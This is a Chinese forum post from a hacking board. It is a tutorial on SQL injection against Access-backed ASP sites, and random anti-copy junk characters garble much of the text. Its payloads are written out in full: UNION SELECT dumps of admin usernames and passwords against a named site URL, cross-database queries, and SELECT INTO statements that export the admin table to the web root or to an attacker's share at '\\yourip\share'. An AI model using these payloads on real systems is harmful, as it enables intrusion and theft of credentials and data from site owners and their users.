--------------------------------------------------------------
" u' Z, O+ P; e. ^3 y& sunion查询法
. V% h* @$ B& f0 }& C2 t首先要说的就是查询办法,一般的查询办法就是5 T' H, a( U/ q
# X. ~) M5 N g$ f) ]) n( U程序代码( M2 K5 K+ i# o
and 1=(select count(*) from admin where left(id,1)='1')
9 F; I0 X7 m3 L: T/ W
4 E/ e4 S9 q$ l% G( _' y, g这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.1 h2 u/ d) Z( K+ ]9 w6 P
所以这个时候,union select横空出现.别以为只能在PHP里用哦...& L. y5 h3 j7 Q+ R5 E
譬如你有一个ACCESS点:
4 \8 F* p# f0 l9 m程序代码* C* v$ H# M2 s, W2 A9 K; {* ^
http://bbs.tian6.com/xiaoyang.asp?coder=1
5 t# u, C- D J" c* b" o* V
( |& G; `6 ~8 M6 e# v4 u8 L知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),, [' _& w8 [1 e# m. }7 F$ C6 w
然后我们直接来:
" B3 D1 w4 g3 K7 V程序代码
! B! E% ^7 C: Rhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]; @7 `- r: A* r2 l, j: Y- Q4 Y: U
m3 E# m0 C6 q, a这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
/ t3 [2 F/ t1 M
# [; i" W0 F; j' @/ [+ g6 r( a1 Z
5 _4 x$ I/ c, p9 D( h: i2 y! |' C! Z& K' d& J) U
---------------------------------------------------------------
8 h1 m* I9 `+ Z" q) K: b1 h* t7 M5 DAccess跨库查询
5 P+ }9 h+ `5 q6 Y% i- u) H有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
0 D, P; Q! U* U8 x0 v: y" l跨库的查询语句:
+ w) |# Y- _5 h! [( v+ }" f/ U子查询:9 M9 h9 g1 O3 I! s3 B2 u
程序代码
6 e8 W5 {; h8 a. w3 e' aand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>01 ~0 [. ~# Q; h
' E$ N$ E6 x! G2 I o
union查询:5 A5 S! h# _' i( J; }# E- O
程序代码
6 }* n% W, r& vunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=13 u0 f* X/ S" J5 f l
6 g7 D0 {1 n5 L跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:. O1 Q( f- A4 Z4 U' F
程序代码2 u0 R7 _7 `9 T: x; P/ s6 M
http://www.4ngel.net/article/46.htm : t& Q! V) R* I k% e1 Z9 S, X; y
http://hf110.com/Article/hack/rqsl/200502/66.html; G% O8 ]8 [7 M* \* d l5 k& w' X
5 ]9 j/ B8 E! M8 U---------------------------------------------------------------1 p; V: k/ W: Q7 v
Access注入,导出txt,htm,html
" |4 O0 Z8 J. V: X子查询语句:" F" R9 v0 e# l3 u$ Q
程序代码
x4 F8 T; `) y" FSelect * into [test.txt] in 'd:\web\' 'text;' from admin7 I; l2 v+ \; n1 A: \
* ~# T& @* x' J
这样就把admin表的内容以test类型存进了d:\web里面.) g0 V* W6 W5 V7 Q/ |
UNION查询:
& r5 S' v0 \' `. ^程序代码" R/ x9 R+ Y7 O1 J C% L7 f7 U; @
union select * into [admin.txt] in 'c:\' 'test;' from admin
( ^ S% Z% Y( \* u$ Q5 y$ m6 Y m
% x( n% D) G0 `& G6 G而且这里也可以保存到本地来:
- f7 k( u7 b8 {6 o. y程序代码
/ v& v! r' C8 y6 zSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
& U# k2 j3 X Q! ~* ~: y* W7 W g
0 I# ]" e5 v3 Z( d4 t不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:7 j/ N+ q, \+ U! l! W% q: |0 B
. M5 K! u, Y0 p* Q6 u# g
程序代码" z' I n! Y ?. l* ~9 _
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
- X7 y# }# E( X1 K$ z% ~, y, X! J, G# L" S5 H
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
: N: k9 p8 M! k9 {$ T9 f9 N: T |
发表于 2012-9-15 14:20:57
收藏
支持
反对